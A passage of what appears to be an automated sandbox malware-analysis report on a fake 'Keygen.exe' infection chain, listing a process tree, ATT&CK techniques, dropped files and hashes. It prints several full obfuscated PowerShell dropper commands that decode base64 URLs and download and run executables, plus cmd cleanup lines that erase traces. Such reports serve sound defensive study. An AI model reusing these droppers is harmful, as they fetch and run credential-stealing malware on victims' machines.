                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1904
                    • C:\Users\Public\mjx.exe
                      "C:\Users\Public\mjx.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2508
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                        6⤵
                        • Loads dropped DLL
                        PID:2636
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3012
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                            8⤵
                            • Loads dropped DLL
                            PID:2100
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              9⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2432
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:836
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            8⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:2180
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 2180 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\421555291427173\\* & exit
                              9⤵
                                PID:2504
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 2180
                                  10⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2336
                        • C:\Users\Public\mjx.exe
                          "C:\Users\Public\mjx.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2972
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\87F5.tmp\b1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:620
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:828
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 2
                    3⤵
                    • Delays execution with timeout.exe
                    PID:1776
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\87F5.tmp\ba.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1992
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2000
                      • C:\Users\Public\glw.exe
                        "C:\Users\Public\glw.exe"
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2228
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2340
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:2580
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 2580 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\243491832699986\\* & exit
                              8⤵
                                PID:1524
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 2580
                                  9⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2156
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2076
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:1580
                          • C:\Users\Public\glw.exe
                            "C:\Users\Public\glw.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2540
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\87F5.tmp\ba1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1664
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:896

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                Modify Existing Service

                1
                T1031

                Defense Evasion

                Modify Registry

                4
                T1112

                Disabling Security Tools

                2
                T1089

                Install Root Certificate

                1
                T1130

                Credential Access

                Credentials in Files

                3
                T1081

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                Collection

                Data from Local System

                3
                T1005

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\MSVCP140.dll
                • C:\ProgramData\VCRUNTIME140.dll
                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\msvcp140.dll
                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\vcruntime140.dll
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0e2dcdb6-1c7e-4382-80c6-87c13b6634ae
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e0bbaba-0dce-4127-aef6-f5e2ed552694
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_703d842d-db99-477b-a461-0935cceaea97
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9462082e-3bde-4613-acd8-10cb67a0759a
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Temp\52sZFvDgql.exe
                • C:\Users\Admin\AppData\Local\Temp\52sZFvDgql.exe
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\b.hta
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\b1.hta
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\ba.hta
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\ba1.hta
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\m.hta
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\m1.hta
                • C:\Users\Admin\AppData\Local\Temp\87F5.tmp\start.bat
                • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                • C:\Users\Admin\AppData\Local\Temp\EALuORZgr1.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\nDZ50WSbLo.exe
                • C:\Users\Admin\AppData\Local\Temp\nDZ50WSbLo.exe
                • C:\Users\Admin\AppData\Local\Temp\ohM6L2JDG5.exe
                • C:\Users\Admin\AppData\Local\Temp\ohM6L2JDG5.exe
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Public\glw.exe
                • C:\Users\Public\glw.exe
                • C:\Users\Public\glw.exe
                • C:\Users\Public\mjx.exe
                • C:\Users\Public\mjx.exe
                • C:\Users\Public\mjx.exe
                • C:\Users\Public\vkf.exe
                • C:\Users\Public\vkf.exe
                • C:\Users\Public\vkf.exe
                • C:\Windows\temp\fxgdsx3o.inf
                • \??\PIPE\srvsvc
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                  MD5

                  02cc7b8ee30056d5912de54f1bdfc219

                  SHA1

                  a6923da95705fb81e368ae48f93d28522ef552fb

                  SHA256

                  1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                  SHA512

                  0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\sqlite3.dll
                • \Users\Admin\AppData\Local\Temp\52sZFvDgql.exe
                • \Users\Admin\AppData\Local\Temp\87F5.tmp\Keygen.exe
                • \Users\Admin\AppData\Local\Temp\EALuORZgr1.exe
                • \Users\Admin\AppData\Local\Temp\EALuORZgr1.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • \Users\Admin\AppData\Local\Temp\nDZ50WSbLo.exe
                • \Users\Admin\AppData\Local\Temp\ohM6L2JDG5.exe
                • \Users\Public\glw.exe
                • \Users\Public\glw.exe
                • \Users\Public\mjx.exe
                • \Users\Public\vkf.exe
                • \Users\Public\vkf.exe
                • memory/612-449-0x0000000000000000-mapping.dmp
                • memory/612-453-0x0000000000000000-mapping.dmp
                • memory/612-443-0x0000000000000000-mapping.dmp
                • memory/612-421-0x0000000000000000-mapping.dmp
                • memory/612-419-0x0000000000000000-mapping.dmp
                • memory/612-441-0x0000000000000000-mapping.dmp
                • memory/612-502-0x0000000000000000-mapping.dmp
                • memory/612-417-0x0000000000000000-mapping.dmp
                • memory/612-499-0x0000000000000000-mapping.dmp
                • memory/612-497-0x0000000000000000-mapping.dmp
                • memory/612-495-0x0000000000000000-mapping.dmp
                • memory/612-445-0x0000000000000000-mapping.dmp
                • memory/612-415-0x0000000000000000-mapping.dmp
                • memory/612-413-0x0000000000000000-mapping.dmp
                • memory/612-447-0x0000000000000000-mapping.dmp
                • memory/612-493-0x0000000000000000-mapping.dmp
                • memory/612-451-0x0000000000000000-mapping.dmp
                • memory/612-389-0x0000000000000000-mapping.dmp
                • memory/612-455-0x0000000000000000-mapping.dmp
                • memory/612-457-0x0000000000000000-mapping.dmp
                • memory/612-459-0x0000000000000000-mapping.dmp
                • memory/612-461-0x0000000000000000-mapping.dmp
                • memory/612-463-0x0000000000000000-mapping.dmp
                • memory/612-465-0x0000000000000000-mapping.dmp
                • memory/612-467-0x0000000000000000-mapping.dmp
                • memory/612-469-0x0000000000000000-mapping.dmp
                • memory/612-471-0x0000000000000000-mapping.dmp
                • memory/612-391-0x0000000000000000-mapping.dmp
                • memory/612-491-0x0000000000000000-mapping.dmp
                • memory/612-370-0x00000000000A0000-0x00000000000A1000-memory.dmp
                  Filesize

                  4KB

                • memory/612-411-0x0000000000000000-mapping.dmp
                • memory/612-371-0x0000000000000000-mapping.dmp
                • memory/612-407-0x0000000000000000-mapping.dmp
                • memory/612-405-0x0000000000000000-mapping.dmp
                • memory/612-475-0x0000000000000000-mapping.dmp
                • memory/612-425-0x0000000000000000-mapping.dmp
                • memory/612-403-0x0000000000000000-mapping.dmp
                • memory/612-401-0x0000000000000000-mapping.dmp
                • memory/612-439-0x0000000000000000-mapping.dmp
                • memory/612-427-0x0000000000000000-mapping.dmp
                • memory/612-399-0x0000000000000000-mapping.dmp
                • memory/612-437-0x0000000000000000-mapping.dmp
                • memory/612-397-0x0000000000000000-mapping.dmp
                • memory/612-429-0x0000000000000000-mapping.dmp
                • memory/612-395-0x0000000000000000-mapping.dmp
                • memory/612-393-0x0000000000000000-mapping.dmp
                • memory/612-473-0x0000000000000000-mapping.dmp
                • memory/612-423-0x0000000000000000-mapping.dmp
